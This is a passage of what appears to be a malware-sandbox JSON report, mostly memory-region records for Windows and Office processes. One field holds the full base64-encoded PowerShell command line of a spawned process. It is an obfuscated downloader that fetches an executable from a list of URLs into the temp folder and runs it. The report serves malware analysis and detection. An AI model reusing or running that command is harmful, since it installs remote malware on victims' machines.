1802231807, "entry_point": 1802043392, "filename": "\\Windows\\System32\\mlang.dll", "id": "region_271", "name": "mlang.dll", "norm_filename": "c:\\windows\\system32\\mlang.dll", "region_type": "memory_mapped_file", "start_va": 1802043392, "timestamp": "00:00:18.454", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1820590080, "type": "region", "version": 1 }, "end_va": 1820622847, "entry_point": 1820590080, "filename": "\\Windows\\System32\\npmproxy.dll", "id": "region_272", "name": "npmproxy.dll", "norm_filename": "c:\\windows\\system32\\npmproxy.dll", "region_type": "memory_mapped_file", "start_va": 1820590080, "timestamp": "00:00:18.477", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1409024, "start_va": 1828192256, "type": "region", "version": 1 }, "end_va": 1829601279, "entry_point": 1828192256, "filename": "\\Windows\\System32\\msxml6.dll", "id": "region_273", "name": "msxml6.dll", "norm_filename": "c:\\windows\\system32\\msxml6.dll", "region_type": "memory_mapped_file", "start_va": 1828192256, "timestamp": "00:00:18.492", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 331776, "start_va": 1832910848, "type": "region", "version": 1 }, "end_va": 1833242623, "entry_point": 1832910848, "filename": "\\Windows\\System32\\winspool.drv", "id": "region_274", "name": "winspool.drv", "norm_filename": "c:\\windows\\system32\\winspool.drv", "region_type": "memory_mapped_file", "start_va": 1832910848, "timestamp": "00:00:18.522", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1806336, "start_va": 1861681152, "type": "region", "version": 1 }, "end_va": 1863487487, "entry_point": 1861681152, "filename": "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF", "id": "region_275", "name": "office.odf", "norm_filename": "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\cultures\\office.odf", "region_type": "memory_mapped_file", "start_va": 1861681152, "timestamp": "00:00:18.536", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12288, "start_va": 1863516160, "type": "region", "version": 1 }, "end_va": 1863528447, "entry_point": 1863516160, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-crt-utility-l1-1-0.dll", "id": "region_276", "name": "api-ms-win-crt-utility-l1-1-0.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-crt-utility-l1-1-0.dll", "region_type": "memory_mapped_file", "start_va": 1863516160, "timestamp": "00:00:18.539", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12288, "start_va": 1863581696, "type": "region", "version": 1 }, "end_va": 1863593983, "entry_point": 1863581696, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-crt-environment-l1-1-0.dll", "id": "region_277", "name": "api-ms-win-crt-environment-l1-1-0.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-crt-environment-l1-1-0.dll", "region_type": "memory_mapped_file", "start_va": 1863581696, "timestamp": "00:00:18.577", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12288, "start_va": 1863647232, "type": "region", "version": 1 }, "end_va": 1863659519, "entry_point": 1863647232, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-crt-filesystem-l1-1-0.dll", "id": "region_278", "name": "api-ms-win-crt-filesystem-l1-1-0.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-crt-filesystem-l1-1-0.dll", "region_type": "memory_mapped_file", "start_va": 1863647232, "timestamp": "00:00:18.585", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12288, "start_va": 1863712768, "type": "region", "version": 1 }, "end_va": 1863725055, "entry_point": 1863712768, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-crt-time-l1-1-0.dll", "id": "region_279", "name": "api-ms-win-crt-time-l1-1-0.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-crt-time-l1-1-0.dll", "region_type": "memory_mapped_file", "start_va": 1863712768, "timestamp": "00:00:18.596", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20480, "start_va": 1863974912, "type": "region", "version": 1 }, "end_va": 1863995391, "entry_point": 1863974912, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-crt-multibyte-l1-1-0.dll", "id": "region_280", "name": "api-ms-win-crt-multibyte-l1-1-0.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-crt-multibyte-l1-1-0.dll", "region_type": "memory_mapped_file", "start_va": 1863974912, "timestamp": "00:00:18.673", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20480, "start_va": 1864040448, "type": "region", "version": 1 }, "end_va": 1864060927, "entry_point": 1864040448, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-crt-math-l1-1-0.dll", "id": "region_281", "name": "api-ms-win-crt-math-l1-1-0.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-crt-math-l1-1-0.dll", "region_type": "memory_mapped_file", "start_va": 1864040448, "timestamp": "00:00:18.695", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12288, "start_va": 1864105984, "type": "region", "version": 1 }, "end_va": 1864118271, "entry_point": 1864105984, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-crt-locale-l1-1-0.dll", "id": "region_282", "name": "api-ms-win-crt-locale-l1-1-0.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-crt-locale-l1-1-0.dll", "region_type": "memory_mapped_file", "start_va": 1864105984, "timestamp": "00:00:18.707", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 446464, "start_va": 1864171520, "type": "region", "version": 1 }, "end_va": 1864617983, "entry_point": 1864171520, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\msvcp140.dll", "id": "region_283", "name": "msvcp140.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\msvcp140.dll", "region_type": "memory_mapped_file", "start_va": 1864171520, "timestamp": "00:00:18.778", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "powershell -e JAB7AHcAYABzAGAAYwBSAEkAcAB0AH0AIAA9ACAAJgAoACIAewAyAH0AewAxAH0AewAwAH0AIgAtAGYAIAAnAG8AYgBqAGUAYwB0ACcALAAnAGUAdwAtACcALAAnAG4AJwApACAALQBDAG8AbQBPAGIAagBlAGMAdAAgACgAIgB7ADQAfQB7ADIAfQB7ADEAfQB7ADMAfQB7ADAAfQAiACAALQBmACAAJwBsAGwAJwAsACcAUwAnACwAJwAuACcALAAnAGgAZQAnACwAJwBXAFMAYwByAGkAcAB0ACcAKQA7ACQAewBXAGUAQgBjAGwAYABpAGAARQBOAHQAfQAgAD0AIAAuACgAIgB7ADAAfQB7ADEAfQB7ADIAfQB7ADMAfQAiACAALQBmACAAJwBuAGUAdwAtACcALAAnAG8AJwAsACcAYgAnACwAJwBqAGUAYwB0ACcAKQAgACgAIgB7ADQAfQB7ADEAfQB7ADMAfQB7ADAAfQB7ADIAfQAiACAALQBmACAAJwBsAGkAZQAnACwAJwB0AGUAbQAuAE4AZQB0ACcALAAnAG4AdAAnACwAJwAuAFcAZQBiAEMAJwAsACcAUwB5AHMAJwApADsAJAB7AHIAYQBgAE4ARABPAE0AfQAgAD0AIAAmACgAIgB7ADMAfQB7ADIAfQB7ADEAfQB7ADAAfQAiACAALQBmACcAYwB0ACcALAAnAGIAagBlACcALAAnAGUAdwAtAG8AJwAsACcAbgAnACkAIAAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAHIAYQBuAGQAbwAnACwAJwBtACcAKQA7ACQAewB1AGAAUgBsAFMAfQAgAD0AIAAoACIAewAxADcAfQB7ADIAMQB9AHsAMQAxAH0AewAxADUAfQB7ADEAfQB7ADMAfQB7ADMAOAB9AHsAMwA5AH0AewAzADcAfQB7ADIAMgB9AHsAMQAwAH0AewA2AH0AewAzADEAfQB7ADAAfQB7ADMANAB9AHsAMQA2AH0AewAyADYAfQB7ADMAMAB9AHsAMgAwAH0AewAxADQAfQB7ADkAfQB7ADMANgB9AHsAMgAzAH0AewA4AH0AewAyADQAfQB7ADIANQB9AHsAMgA5AH0AewAyADgAfQB7ADEAMgB9AHsANQB9AHsAMgB9AHsAMQA5AH0AewAyADcAfQB7ADcAfQB7ADEAMwB9AHsANAB9AHsAMQA4AH0AewAzADMAfQB7ADMANQB9AHsAMwAyAH0AIgAgAC0AZgAgACcAZQBhAHQAcwBwAGEAJwAsACcAaQBuAGUAJwAsACcAcwAuAGMAJwAsACcAYQBsAC4AYwBvAG0AJwAsACcAZwAnACwAJwBsAHUAJwAsACcAaAAnACwAJwByAGUAcwBzAC8AJwAsACcAZQBzAC4AbgBlACcALAAnAC8ALABoAHQAdABwACcALAAnACwAJwAsACcALwBrAGUAJwAsACcALwBiAG0AYQBzAHQAZQByAHAAJwAsACcARAAnACwAJwB5AHIAcgAnACwAJwByACcALAAnAC4AdQBrAC8AVgBRAC8ALABoAHQAdABwADoALwAvAHUAbQBlACcALAAnAGgAdAB0ACcALAAnAE4AJwAsACcAbwBtAC8AJwAsACcAbwBtAC8AJwAsACcAcAA6AC8AJwAsACcALwBoAFEAbwBCAG0ALwAnACwAJwAvAC8AbgB5AGUAcgBnACcALAAnAHQALwAnACwAJwBxAHEAcgAvACwAJwAsACcAeAAnACwAJwB3AG8AcgBkAHAAJwAsACcAcAA6AC8AJwAsACcAaAB0AHQAJwAsACcAeAAuAGMAJwAsACcAdAB0AHAAOgAvAC8AJwAsACcASgBGAGgALwAnACwAJwBuAGsAJwAsACcAbQAuAGMAbwAnACwAJwBHACcALAAnADoAJwAsACcAdAAnACwAJwAvAHMAJwAsACcAaQBtAHAAbAB5AGUAbABlAGcAYQBuACcAKQAuACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACcAbABpAHQAJwAsACcAUwBwACcAKQAuAEkAbgB2AG8AawBlACgAJwAsACcAKQA7ACQAewBuAGAAQQBtAEUAfQAgAD0AIAAkAHsAcgBhAG4ARABgAE8ATQB9AC4AKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAHQAJwAsACcAbgBlAHgAJwApAC4ASQBuAHYAbwBrAGUAKAAxACwAIAA2ADUANQAzADYAKQA7ACQAewBQAGAAQQBUAEgAfQAgAD0AIAAkAHsARQBgAE4AdgA6AGAAVABFAE0AUAB9ACAAKwAgACcAXAAnACAAKwAgACQAewBOAGAAQQBtAEUAfQAgACsAIAAoACIAewAxAH0AewAwAH0AIgAtAGYAJwBlAHgAZQAnACwAJwAuACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAHsAdQBgAFIAbAB9ACAAaQBuACAAJAB7AFUAUgBgAGwAUwB9ACkAewB0AHIAeQB7ACQAewB3AEUAYgBgAGMATABJAGUAYABOAHQAfQAuACgAIgB7ADEAfQB7ADAAfQB7ADIAfQAiAC0AZgAnAG4AbAAnACwAJwBEAG8AdwAnACwAJwBvAGEAZABGAGkAbABlACcAKQAuAEkAbgB2AG8AawBlACgAJAB7AHUAYABSAEwAfQAuACgAIgB7ADIAfQB7ADEAfQB7ADAAfQAiAC0AZgAgACcAbgBnACcALAAnAGkAJwAsACcAVABvAFMAdAByACcAKQAuAEkAbgB2AG8AawBlACgAKQAsACAAJAB7AFAAYABBAHQAaAB9ACkAOwAmACgAIgB7ADAAfQB7ADEAfQB7ADIAfQAiACAALQBmACAAJwBTACcALAAnAHQAYQByAHQALQAnACwAJwBQAHIAbwBjAGUAcwBzACcAKQAgACQAewBQAEEAYABUAEgAfQA7AGIAcgBlAGEAawA7AH0AYwBhAHQAYwBoAHsALgAoACIAewAyAH0AewAxAH0AewAwAH0AIgAtAGYAJwBpAHQAZQAtAGgAbwBzAHQAJwAsACcAcgAnACwAJwB3ACcAKQAgACQAewBfAH0ALgAiAEUAeABDAGAAZQBgAFAAVABpAE8ATgAiAC4AIgBtAGUAcwBzAGAAQQBgAGcAZQAiADsAfQB9AA0ACgA=", "filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "id": "proc_2", "image_name": "powershell.exe", "monitor_reason": "child_process", "monitored_id": 2, "origin_monitor_id": 1, "ref_parent_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000002-region_00000500-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_48", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_500", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:00:30.593", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_501", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:00:30.593", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 0, "filename": null, "id": "region_502", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:00:30.593", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000503-addr_0x0000000000130000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_49", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 1245184, "type": "region", "version": 1 }, "end_va": 1507327, "entry_point": 0, "filename": null, "id": "region_503", "name": "private_0x0000000000130000", "norm_filename": null, "region_type": "private_memory", "start_va": 1245184, "timestamp": "00:00:30.597", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 466944, "start_va": 571146240, "type": "region", "version": 1 }, "end_va": 571613183, "entry_point": 571175779, "filename": "\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "id": "region_504", "name": "powershell.exe", "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "region_type": "memory_mapped_file", "start_va": 571146240, "timestamp": "00:00:30.597", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1294336, "start_va": 2002518016, "type": "region", "version": 1 }, "end_va": 2003812351, "entry_point": 2002518016, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_505", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2002518016, "timestamp": "00:00:30.606", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 2004877312, "type": "region", "version": 1 }, "end_va": 2004881407, "entry_point": 2004877312, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_506", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 2004877312, "timestamp": "00:00:30.607", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2147155968, "type": "region", "version": 1 }, "end_va": 2147299327, "entry_point": 0, "filename": null, "id": "region_507", "name": "pagefile_0x000000007ffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2147155968, "timestamp": "00:00:30.611", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000508-addr_0x000000007ffd4000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_50", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147303424, "type": "region", "version": 1 }, "end_va": 2147307519, "entry_point": 0, "filename": null, "id": "region_508", "name": "private_0x000000007ffd4000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147303424, "timestamp": "00:00:30.611", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000509-addr_0x000000007ffdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_51", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147348480, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_509", "name": "private_0x000000007ffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147348480, "timestamp": "00:00:30.611", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000510-addr_0x00000000002b0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_52", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 2818048, "type": "region", "version": 1 }, "end_va": 3866623, "entry_point": 0, "filename": null, "id": "region_510", "name": "private_0x00000000002b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2818048, "timestamp": "00:00:30.618", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1972174848, "type": "region", "version": 1 }, "end_va": 1972477951, "entry_point": 1972207072, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_511", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1972174848, "timestamp": "00:00:30.618", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 868352, "start_va": 1983184896, "type": "region", "version": 1 }, "end_va": 1984053247, "entry_point": 1983495652, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_512", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1983184896, "timestamp": "00:00:30.619", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_513", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:30.906", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_514", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:00:30.906", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 749567, "entry_point": 327680, "filename": "\\Windows\\System32\\locale.nls", "id": "region_515", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 327680, "timestamp": "00:00:30.906", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1616969728, "type": "region", "version": 1 }, "end_va": 1617272831, "entry_point": 1616981588, "filename": "\\Windows\\System32\\mscoree.dll", "id": "region_516", "name": "mscoree.dll", "norm_filename": "c:\\windows\\system32\\mscoree.dll", "region_type": "memory_mapped_file", "start_va": 1616969728, "timestamp": "00:00:30.907", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 81920, "start_va": 1948123136, "type": "region", "version": 1 }, "end_va": 1948205055, "entry_point": 1948123136, "filename": "\\Windows\\System32\\atl.dll", "id": "region_517", "name": "atl.dll", "norm_filename": "c:\\windows\\system32\\atl.dll", "region_type": "memory_mapped_file", "start_va": 1948123136, "timestamp": "00:00:30.907", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1973878784, "type": "region", "version": 1 }, "end_va": 1974521855, "entry_point": 1974091735, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_518", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1973878784, "timestamp": "00:00:30.921", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1974534144, "type": "region", "version": 1 }, "end_va": 1974575103, "entry_point": 1974539116, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_519", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1974534144, "timestamp": "00:00:30.922", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 659456, "start_va": 1974861824, "type": "region", "version": 1 }, "end_va": 1975521279, "entry_point": 1975067699, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_520", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1974861824, "timestamp": "00:00:30.922", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 1975582720, "type": "region", "version": 1 }, "end_va": 1976406015, "entry_point": 1975703313, "filename": "\\Windows\\System32\\user32.dll", "id": "region_521", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1975582720, "timestamp": "00:00:30.923", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1979908096, "type": "region", "version": 1 }, "end_va": 1980563455, "entry_point": 1979992549, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_522", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1979908096, "timestamp": "00:00:30.923", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1980628992, "type": "region", "version": 1 }, "end_va": 1980985343, "entry_point": 1980734374, "filename": "\\Windows\\System32\\shlwapi.dll", "id": "region_523", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\system32\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1980628992, "timestamp": "00:00:30.924", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1983053824, "type": "region", "version": 1 }, "end_va": 1983156223, "entry_point": 1983072629, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_524", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1983053824, "timestamp": "00:00:30.924", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 2000355328, "type": "region", "version": 1 }, "end_va": 2001059839, "entry_point": 2000397426, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_525", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 2000355328, "timestamp": "00:00:30.925", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 2001076224, "type": "region", "version": 1 }, "end_va": 2002501631, "entry_point": 2001386045, "filename": "\\Windows\\System32\\ole32.dll", "id": "region_526", "name": "ole32.dll", "norm_filename": "c:\\windows\\system32\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 2001076224, "timestamp": "00:00:30.926", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 319488, "start_va": 2003894272, "type": "region", "version": 1 }, "end_va": 2004213759, "entry_point": 2003934217, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_527", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 2003894272, "timestamp": "00:00:30.926", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 2004221952, "type": "region", "version": 1 }, "end_va": 2004807679, "entry_point": 2004238257, "filename": "\\Windows\\System32\\oleaut32.dll", "id": "region_528", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\system32\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 2004221952, "timestamp": "00:00:30.927", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2137980928, "type": "region", "version": 1 }, "end_va": 2139029503, "entry_point": 0, "filename": null, "id": "region_529", "name": "pagefile_0x000000007f6f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2137980928, "timestamp": "00:00:30.927", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000530-addr_0x00000000001f0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_53", "ref_source": "summary", "ref_type": "process_dump", "type": 